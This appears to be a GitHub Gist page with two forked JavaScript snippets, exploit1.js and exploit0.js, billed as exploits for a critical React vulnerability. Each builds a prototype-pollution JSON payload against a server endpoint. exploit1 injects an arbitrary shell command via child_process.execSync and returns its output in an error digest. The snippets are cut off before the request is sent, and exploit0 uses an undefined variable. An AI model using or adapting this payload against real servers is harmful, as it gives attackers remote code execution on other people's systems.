Razzul razzul

🏠

Working from home

razzul / exploit1.js

Created December 16, 2025 09:12 — forked from akshaymarch7/exploit1.js

React Critical Vulnerability (CVSS 10.0) - exploit1 code

	(async () => {
	// === CONFIGURATION ===
	const cmd = "touch iWasHere"; // The command you want to run
	const targetUrl = "/namaste"; // The endpoint to hit (relative to current domain)

	console.log(`[*] Attempting to run command: ${cmd}`);

	// 1. Construct the malicious payload
	// This injects the command into a child_process.execSync call and throws the result in an error digest
	const payloadJson = `{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('${cmd}').toString('base64');throw Object.assign(new Error('x'),{digest: res});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}`;

razzul / exploit0.js

Created December 16, 2025 09:11 — forked from akshaymarch7/exploit0.js

React Critical Vulnerability (CVSS 10.0) - exploit0 code

	(async () => {
	// === CONFIGURATION ===
	const targetUrl = "/namaste"; // The endpoint to hit (relative to current domain)

	console.log(`[*] Attempting to run command: ${cmd}`);

	// 1. Construct the malicious payload
	// This injects the command into a child_process.execSync call and throws the result in an error digest
	const payloadJson = `{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"console.log('meowmeow')//","_formData":{"get":"$1:constructor:constructor"}}}`;